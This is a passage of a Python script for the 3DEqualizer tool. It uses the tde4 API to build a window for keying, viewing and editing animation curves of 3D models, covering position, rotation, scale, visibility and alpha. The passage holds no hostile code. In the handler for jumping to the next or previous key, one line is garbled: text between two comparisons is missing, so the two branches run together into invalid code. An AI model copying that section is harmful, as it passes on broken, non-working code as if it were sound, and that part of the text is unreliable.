tde4.createCurveKey(rot_x_curves_list[item],[frame,float(phi_x)])\r\n\t\ttde4.setCurveKeyFixedXFlag(rot_x_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(rot_x_curves_list[item],key,\"LINEAR\")\r\n\t\tkey = tde4.createCurveKey(rot_y_curves_list[item],[frame,float(phi_y)])\r\n\t\ttde4.setCurveKeyFixedXFlag(rot_y_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(rot_y_curves_list[item],key,\"LINEAR\")\r\n\t\tkey = tde4.createCurveKey(rot_z_curves_list[item],[frame,float(phi_z)])\r\n\t\ttde4.setCurveKeyFixedXFlag(rot_z_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(rot_z_curves_list[item],key,\"LINEAR\")\r\n\r\n\t\t#create scale curves keys..\r\n\t\tkey = tde4.createCurveKey(scale_curves_list[item],[frame,float(s0)])\r\n\t\ttde4.setCurveKeyFixedXFlag(scale_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(scale_curves_list[item],key,\"LINEAR\")\r\n\r\n\t\t#create visibility curves keys...\r\n\t\tvis_status = tde4.get3DModelVisibleFlag(pg,model)\r\n\t\tkey = tde4.createCurveKey(visibility_curves_list[item],[frame,int(vis_status)])\r\n\t\ttde4.setCurveKeyFixedXFlag(visibility_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(visibility_curves_list[item],key,\"LINEAR\")\r\n\r\n\t\t#create alpha curves keys...\r\n\t\talpha_v = tde4.get3DModelColor(pg,model)\r\n\t\tkey = tde4.createCurveKey(alpha_curves_list[item],[frame,alpha_v[3]])\r\n\t\ttde4.setCurveKeyFixedXFlag(alpha_curves_list[item],key,1)\r\n\t\ttde4.setCurveKeyMode(alpha_curves_list[item],key,\"LINEAR\")\r\n\telse:\r\n\t\ttde4.postQuestionRequester(window_title,\"Error, exactly one item must be selected.\",\"Ok\")\r\n\r\n\r\ndef Anim_Main_Callback(req,widget,action):\r\n\tpg = tde4.getCurrentPGroup()\r\n\tcam = tde4.getCurrentCamera()\r\n\tpg_type = tde4.getPGroupType(pg)\r\n\tframe = tde4.getCurrentFrame(cam)\r\n\tframes = tde4.getCameraNoFrames(tde4.getCurrentCamera())\r\n\tmlist = tde4.get3DModelList(pg,1)\r\n\r\n\tif widget == \"create_update_anim_curves_btn\":\r\n\t\tCreate_Keys(pg,cam,mlist,frame)\r\n\r\n\tif widget == \"model_list\":\r\n\t\ttde4.detachCurveAreaWidgetAllCurves(anim_req,\"curves_area\")\r\n\t\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\t\tfor item in range(0,no_of_items):\r\n\t\t\ttde4.removeAllListWidgetItems(anim_req,\"curves_list\")\r\n\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\tif sel_flag == 1:\r\n\t\t\t\tlabel = tde4.getListWidgetItemLabel(anim_req,\"model_list\",item)\r\n\t\t\t\tlabel = str(label) + \" \" + str(\"Curves :\")\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",label,0)\t\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\" \",1)\t\t\t\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Position X\",2)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Position Y\",3)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Position Z\",4)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Rotation X\",5)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Rotation Y\",6)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Rotation Z\",7)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Uniform Scale\",8)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Visibility\",9)\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"curves_list\",\"Alpha\",10)\r\n\t\t\t\tbreak\r\n\r\n\t\ttde4.detachCurveAreaWidgetAllCurves(anim_req,\"curves_area\")\r\n\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",pos_x_curves_list[item],1.0,0.4,0.4,1)\r\n\t\ttde4.setCurveAreaWidgetXOffset(anim_req,\"curves_area\",frame_offset-1)\r\n\r\n\r\n\tif widget == \"curves_list\":\r\n\t\tcount = 0\r\n\t\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\t\tfor item in range(0,no_of_items):\r\n\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\tif sel_flag == 1:\r\n\t\t\t\tbreak\r\n\t\t\tcount = count + 1\r\n\r\n\t\ttde4.detachCurveAreaWidgetAllCurves(anim_req,\"curves_area\")\t\t\r\n\t\tif tde4.getListWidgetItemSelectionFlag(anim_req,\"curves_list\",2):\r\n\t\t\tcurve = pos_x_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,1.0,0.0,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,1.0,0.0,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\t\t\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(req,\"curves_list\",3):\r\n\t\t\tcurve = pos_y_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,0.0,1.0,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,0.0,1.0,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\t\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(anim_req,\"curves_list\",4):\r\n\t\t\tcurve = pos_z_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\t\t\t\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,0.0,0.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,0.0,0.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(anim_req,\"curves_list\",5):\r\n\t\t\tcurve = rot_x_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\t\t\t\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,0.0,1.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,0.0,1.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(anim_req,\"curves_list\",6):\r\n\t\t\tcurve = rot_y_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,1.0,0.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,1.0,0.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\t\t\t\t\t\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(anim_req,\"curves_list\",7):\r\n\t\t\tcurve = rot_z_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,1.0,1.0,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(anim_req,\"curves_area\",curve,1.0,1.0,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(req,\"curves_list\",8):\r\n\t\t\tcurve = scale_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(req,\"curves_area\",curve,1.0,0.3,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(req,\"curves_area\",curve,1.0,0.3,0.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(req,\"curves_list\",9):\r\n\t\t\tcurve = visibility_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(req,\"curves_area\",curve,1.0,1.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(req,\"curves_area\",curve,1.0,1.0,1.0,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\t\tif tde4.getListWidgetItemSelectionFlag(req,\"curves_list\",10):\r\n\t\t\tcurve = alpha_curves_list[count]\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tif len(keylist) >= 1:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(req,\"curves_area\",curve,0.0,1.0,0.5,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(req,\"curves_area\",1,frames,Min_Max(keylist,curve)[2]-0.1,Min_Max(keylist,curve)[3]+0.1)\r\n\t\t\telse:\r\n\t\t\t\ttde4.attachCurveAreaWidgetCurve(req,\"curves_area\",curve,0.0,1.0,0.5,1)\r\n\t\t\t\ttde4.setCurveAreaWidgetDimensions(req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\tif widget == \"minus\":\r\n\t\t#remove selected item curves data from curves list...\r\n\t\tcount = 0\r\n\t\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\t\tfor item in range(0,no_of_items):\r\n\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\tif sel_flag == 1:\r\n\t\t\t\tbreak\r\n\t\t\tcount = count + 1\r\n\t\ttry:\t\r\n\t\t\tdel pos_x_curves_list[count]\r\n\t\t\tdel pos_y_curves_list[count]\r\n\t\t\tdel pos_z_curves_list[count]\r\n\t\t\tdel rot_x_curves_list[count]\r\n\t\t\tdel rot_y_curves_list[count]\r\n\t\t\tdel rot_z_curves_list[count]\r\n\t\t\tdel scale_curves_list[count]\r\n\t\t\tdel visibility_curves_list[count]\r\n\t\t\tdel alpha_curves_list[count]\r\n\t\t\t#remove selected item from the model list...\r\n\t\t\tfor item in range(0,no_of_items):\r\n\t\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\t\tif sel_flag == 1:\r\n\t\t\t\t\ttde4.removeListWidgetItem(anim_req,\"model_list\",item)\r\n\t\t\t\t\ttde4.removeAllListWidgetItems(anim_req,\"curves_list\")\r\n\t\t\t\t\tbreak\r\n\t\t\ttde4.detachCurveAreaWidgetAllCurves(anim_req,\"curves_area\")\r\n\t\texcept:\r\n\t\t\tpass\t\t\r\n\r\n\tif widget == \"plus\":\r\n\t\tif len(mlist) == 1:\r\n\t\t\tc = 0\r\n\t\t\tm_name = tde4.get3DModelName(pg,mlist[0])\r\n\t\t\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\t\t\tfor item in range(0,no_of_items):\r\n\t\t\t\tlabel = tde4.getListWidgetItemLabel(anim_req,\"model_list\",item)\r\n\t\t\t\tif m_name != label:\r\n\t\t\t\t\tc = 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tc = 0\r\n\t\t\t\t\tbreak\t\t\t\t\t\r\n\t\t\tif c == 1:\r\n\t\t\t\t#append position curves...\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\tpos_x_curves_list.append(curve_id)\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\tpos_y_curves_list.append(curve_id)\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\tpos_z_curves_list.append(curve_id)\r\n\t\t\t\t#append rotation curves...\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\trot_x_curves_list.append(curve_id)\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\trot_y_curves_list.append(curve_id)\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\trot_z_curves_list.append(curve_id)\r\n\t\t\t\t#append scale curves...\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\tscale_curves_list.append(curve_id)\r\n\t\t\t\t#append visibility curves...\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\tvisibility_curves_list.append(curve_id)\t\r\n\t\t\t\t#append alpha curves...\r\n\t\t\t\tcurve_id = tde4.createCurve()\r\n\t\t\t\talpha_curves_list.append(curve_id)\r\n\t\t\t\t#add 3DModel name to list widget...\r\n\t\t\t\ttde4.insertListWidgetItem(anim_req,\"model_list\",m_name)\r\n\t\telse:\r\n\t\t\ttde4.postQuestionRequester(window_title,\"Error, exactly one 3DModel must be selected.\",\"Ok\")\r\n\r\n\tif widget == \"view_all\" or widget == \"view_all_menu_widget\":\r\n\t\ty = []\r\n\t\tcurves_list = tde4.getCurveAreaWidgetCurveList(anim_req,\"curves_area\")\r\n\t\tfor curve in curves_list:\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tfor key in keylist:\r\n\t\t\t\tpos_2d = tde4.getCurveKeyPosition(curve,key)\r\n\t\t\t\ty.append(pos_2d[1])\r\n\t\tif len(y) > 0:\r\n\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,min(y)-0.1,max(y)+0.1)\r\n\t\telse:\r\n\t\t\ttde4.setCurveAreaWidgetDimensions(anim_req,\"curves_area\",1.0,frames,-0.2,1.0)\r\n\r\n\tif widget == \"key-\" or widget == \"key+\" or widget == \"jump_previous_key\" or widget == \"jump_next_key\":\r\n\t\tcurve_list = tde4.getCurveAreaWidgetCurveList(anim_req,\"curves_area\")\r\n\t\tcurve = curve_list[0]\r\n\t\tif widget == \"key+\" or widget == \"jump_next_key\":\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\t\t\tf = 1000000\r\n\t\t\tfor key in keylist:\r\n\t\t\t\tpos = tde4.getCurveKeyPosition(curve,key)\r\n\t\t\t\tif int(pos[0])>frame and int(pos[0])f:\r\n\t\t\t\t\tf = int(pos[0])\r\n\t\t\t\t\tbreak\r\n\t\t\tif f!= -1:\r\n\t\t\t\ttde4.setCurrentFrame(cam,f)\r\n\t\t\t\ttde4.setCurveAreaWidgetCursorPosition(anim_req,\"curves_area\",tde4.getCurrentFrame(cam))\r\n\r\n\tif widget == \"delete_keys_btn\":\r\n\t\t#make sure only one item must be selected...\r\n\t\tcount = 0\r\n\t\tno_of_items = tde4.getListWidgetNoItems(anim_req,\"model_list\")\r\n\t\tfor item in range(0,no_of_items):\r\n\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\tif sel_flag == 1:\r\n\t\t\t\tcount = count + 1\r\n\r\n\t\tif count == 1:\r\n\t\t\tfor item in range(0,no_of_items):\r\n\t\t\t\tsel_flag = tde4.getListWidgetItemSelectionFlag(anim_req,\"model_list\",item)\r\n\t\t\t\tif sel_flag == 1:\r\n\t\t\t\t\tbreak\r\n\t\t\ttde4.deleteAllCurveKeys(pos_x_curves_list[item])\t\t\t\r\n\t\t\ttde4.deleteAllCurveKeys(pos_y_curves_list[item])\r\n\t\t\ttde4.deleteAllCurveKeys(pos_z_curves_list[item])\r\n\t\t\ttde4.deleteAllCurveKeys(rot_x_curves_list[item])\t\t\t\r\n\t\t\ttde4.deleteAllCurveKeys(rot_y_curves_list[item])\t\t\t\r\n\t\t\ttde4.deleteAllCurveKeys(rot_z_curves_list[item])\t\t\t\r\n\t\t\ttde4.deleteAllCurveKeys(scale_curves_list[item])\t\t\t\r\n\t\t\ttde4.deleteAllCurveKeys(visibility_curves_list[item])\r\n\t\t\ttde4.deleteAllCurveKeys(alpha_curves_list[item])\r\n\t\telse:\r\n\t\t\ttde4.postQuestionRequester(window_title,\"Error, exactly one item must be selected.\",\"Ok\")\r\n\r\n\r\n\r\ndef Curvearea_Callback(req,widget,action):\r\n\tcam = tde4.getCurrentCamera()\r\n\tif action==3 or action==2:\r\n\t\tf = tde4.getCurveAreaWidgetCursorPosition(anim_req,\"curves_area\")\r\n\t\tn = tde4.getCameraNoFrames(cam)\r\n\t\tif f < 1: f = 1\r\n\t\tif f > n: f = 1\r\n\t\ttde4.setCurrentFrame(cam,int(f))\r\n\r\ndef Editmenu_Callback(req,widget,action):\r\n\tif widget == \"delete_cvs\":\r\n\t\tcurve_list = tde4.getCurveAreaWidgetCurveList(anim_req,\"curves_area\")\r\n\t\tfor curve in curve_list:\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,1)\r\n\t\t\tfor key in keylist:\r\n\t\t\t\ttde4.deleteCurveKey(curve,key)\r\n\t\t\ttde4.updateGUI(1)\r\n\r\n\tif widget == \"set_linear\" or widget == \"set_smooth\" or widget == \"set_broken\":\r\n\t\tmode = widget[4:10].upper()\r\n\t\tcurve_list = tde4.getCurveAreaWidgetCurveList(anim_req,\"curves_area\")\t\t\r\n\t\tfor curve in curve_list:\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,1)\r\n\t\t\tfor key in keylist:\r\n\t\t\t\ttde4.setCurveKeyMode(curve,key,mode)\r\n\t\t\t\tif mode!=\"LINEAR\":\r\n\t\t\t\t\tk0 = tde4.getPrevCurveKey(curve,key)\r\n\t\t\t\t\tk1 = tde4.getNextCurveKey(curve,key)\r\n\t\t\t\t\tif k0 != None and k1 != None:\r\n\t\t\t\t\t\tv0 = tde4.getCurveKeyPosition(curve,k0)\r\n\t\t\t\t\t\tv1 = tde4.getCurveKeyPosition(curve,k1)\r\n\t\t\t\t\t\ttx = (v0[0]-v1[0])/50.0\r\n\t\t\t\t\t\tty = (v0[1]-v1[1])/50.0\r\n\t\t\t\t\t\ttde4.setCurveKeyTangent1(curve,key,[tx,ty])\r\n\t\t\t\t\t\ttde4.setCurveKeyTangent2(curve,key,[-tx,-ty])\r\n\t\ttde4.updateGUI(1)\r\n\r\n\tif widget == \"flatten\":\r\n\t\tcurve_list = tde4.getCurveAreaWidgetCurveList(anim_req,\"curves_area\")\t\t\r\n\t\tfor curve in curve_list:\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,1)\r\n\t\t\tfor key in keylist:\r\n\t\t\t\tt = tde4.getCurveKeyTangent1(curve,key)\r\n\t\t\t\tt[1] = 0.0\r\n\t\t\t\ttde4.setCurveKeyTangent1(curve,key,t)\r\n\t\t\t\tt = tde4.getCurveKeyTangent2(curve,key)\r\n\t\t\t\tt[1] = 0.0\r\n\t\t\t\ttde4.setCurveKeyTangent2(curve,key,t)\r\n\t\ttde4.updateGUI(1)\r\n\r\n\tif widget == \"fix_cvs\" or widget == \"unfix_cvs\":\r\n\t\tif widget == \"fix_cvs\": flag = 1\r\n\t\telse: flag = 0\r\n\t\tcurve_list = tde4.getCurveAreaWidgetCurveList(anim_req,\"curves_area\")\t\t\r\n\t\tfor curve in curve_list:\r\n\t\t\tkeylist = tde4.getCurveKeyList(curve,1)\r\n\t\t\tfor key in keylist:\r\n\t\t\t\ttde4.setCurveKeyFixedXFlag(curve,key,flag)\r\n\t\ttde4.updateGUI(1)\r\n\r\n\r\ndef Min_Max(keylist,curve):\r\n\tkeylist = tde4.getCurveKeyList(curve,0)\r\n\tx = []\r\n\ty = []\r\n\tfor key in keylist:\r\n\t\tpos_2d = tde4.getCurveKeyPosition(curve,key)\r\n\t\tx.append(pos_2d[0])\r\n\t\ty.append(pos_2d[1])\r\n\treturn min(x),max(x),min(y),max(y)\r\n\r\n\r\nif pg_type == \"CAMERA\":\r\n\tif len(mlist) > 0:\r\n\t\tcount = 0\r\n\t\tfor model in mlist:\r\n\t\t\tsurvey_flag = tde4.get3DModelSurveyFlag(pg,model)\r\n\t\t\tif survey_flag == 1:\r\n\t\t\t\tcount = count + 1\r\n\t\tif count == 0:\r\n\t\t\ttry:\r\n\t\t\t\tanim_req\t= _anim_requester\r\n\t\t\texcept (ValueError,NameError,TypeError):\r\n\t\t\t\tanim_req\t= tde4.createCustomRequester()\r\n\t\t\t\t_anim_requester\t= anim_req\r\n\r\n\t\t\t\t#anim_req = tde4.createCustomRequester()\r\n\t\t\t\t#add menu bar widget...\r\n\t\t\t\ttde4.addMenuBarWidget(anim_req,\"menu_bar\")\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"menu_bar\",\"ATTACH_WINDOW\",\"ATTACH_POSITION\",\"ATTACH_WINDOW\",\"ATTACH_NONE\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"menu_bar\",2,15,2,0)\r\n\r\n\t\t\t\t#add edit menu...\r\n\t\t\t\ttde4.addMenuWidget(anim_req,\"edit_menu\",\"Edit\",\"menu_bar\",0)\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"delete_cvs\",\"Delete CVs\",\"edit_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"delete_cvs\",8)\r\n\t\t\t\ttde4.addMenuSeparatorWidget(anim_req,\"sep1\",\"edit_menu\")\r\n\t\t\t\ttde4.addMenuWidget(anim_req,\"set_cvs_menu\",\"Set CVs To\",\"edit_menu\")\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"set_linear\",\"Linear\",\"set_cvs_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"set_linear\",108)\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"set_smooth\",\"Smooth\",\"set_cvs_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"set_smooth\",115)\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"set_broken\",\"Broken\",\"set_cvs_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"set_broken\",98)\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"flatten\",\"Flatten Tangents\",\"edit_menu\")\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"fix_cvs\",\"Fix CVs Vertically\",\"edit_menu\")\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"unfix_cvs\",\"Unfix CVs Vertically\",\"edit_menu\")\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"jump_previous_key\",\"Jump to Previous Key\",\"edit_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"jump_previous_key\",3018)\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"jump_next_key\",\"Jump to Next Key\",\"edit_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"jump_next_key\",3019)\r\n\r\n\t\t\t\t#add view menu...\r\n\t\t\t\ttde4.addMenuWidget(anim_req,\"view_menu\",\"View\",\"menu_bar\",0)\r\n\t\t\t\ttde4.addMenuButtonWidget(anim_req,\"view_all_menu_widget\",\"View All\",\"view_menu\")\r\n\t\t\t\ttde4.setWidgetShortcut(anim_req,\"view_all_menu_widget\",32)\r\n\r\n\t\t\t\t#add curve are widget...\r\n\t\t\t\ttde4.addCurveAreaWidget(anim_req,\"curves_area\",\"\",100)\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"curves_area\",\"ATTACH_WINDOW\",\"ATTACH_POSITION\",\"ATTACH_AS_IS\",\"ATTACH_WINDOW\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"curves_area\",5,82,-1000,30)\r\n\r\n\t\t\t\t#add live update toggle widget...\r\n\t\t\t\tlive_toggle = tde4.addToggleWidget(anim_req,\"live_update_toggle\",\"Viewport Realtime live update\",0)\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"live_update_toggle\",\"ATTACH_POSITION\",\"ATTACH_POSITION\",\"ATTACH_WINDOW\",\"ATTACH_AS_IS\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"live_update_toggle\",55,57,2,0)\r\n\r\n\t\t\t\t#add 3DModels list widget...\r\n\t\t\t\ttde4.addListWidget(anim_req,\"model_list\",\"\",1,80)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"model_list\",\"curves_area\",\"\",\"curves_area\",\"curves_area\")\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"model_list\",\"ATTACH_WIDGET\",\"ATTACH_WINDOW\",\"ATTACH_OPPOSITE_WIDGET\",\"ATTACH_WINDOW\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"model_list\",5,5,0,400)\t\r\n\r\n\t\t\t\t#add 3DModels button widget...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"plus\",\"+\",70,10)\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"plus\",\"ATTACH_POSITION\",\"ATTACH_POSITION\",\"ATTACH_WINDOW\",\"ATTACH_AS_IS\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"plus\",87,92,345,0)\r\n\r\n\t\t\t\t#subtract 3DModels button widget...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"minus\",\"-\",70,10)\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"minus\",\"ATTACH_POSITION\",\"ATTACH_POSITION\",\"ATTACH_WINDOW\",\"ATTACH_AS_IS\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"minus\",93,98,345,0)\r\n\r\n\t\t\t\t#add list widget...\r\n\t\t\t\ttde4.addListWidget(anim_req,\"curves_list\",\"\",1,80)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"curves_list\",\"curves_area\",\"\",\"curves_area\",\"curves_area\")\r\n\t\t\t\ttde4.setWidgetAttachModes(anim_req,\"curves_list\",\"ATTACH_WIDGET\",\"ATTACH_WINDOW\",\"ATTACH_OPPOSITE_WIDGET\",\"ATTACH_WINDOW\")\r\n\t\t\t\ttde4.setWidgetOffsets(anim_req,\"curves_list\",5,5,390,30)\r\n\r\n\t\t\t\t#add 3DModel name to model list widget...\r\n\t\t\t\tfor i in range(len(mlist)):\r\n\t\t\t\t\tname = tde4.get3DModelName(pg,mlist[i])\r\n\t\t\t\t\ttde4.insertListWidgetItem(anim_req,\"model_list\",str(name),i)\r\n\r\n\t\t\t\t#create/update animation curves button widget...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"create_update_anim_curves_btn\",\"Create/Update Anim Curves Keys\",240,5)\r\n\t\t\t\ttde4.setWidgetLinks(anim_req,\"create_update_anim_curves_btn\",\"\",\"\",\"curves_area\",\"\")\r\n\r\n\t\t\t\t#delete all anim curves keys button widget...\r\n\t\t\t\ttde4.addButtonWidget(anim_req,\"delete_keys_btn\",\"Delete all Anim Curves 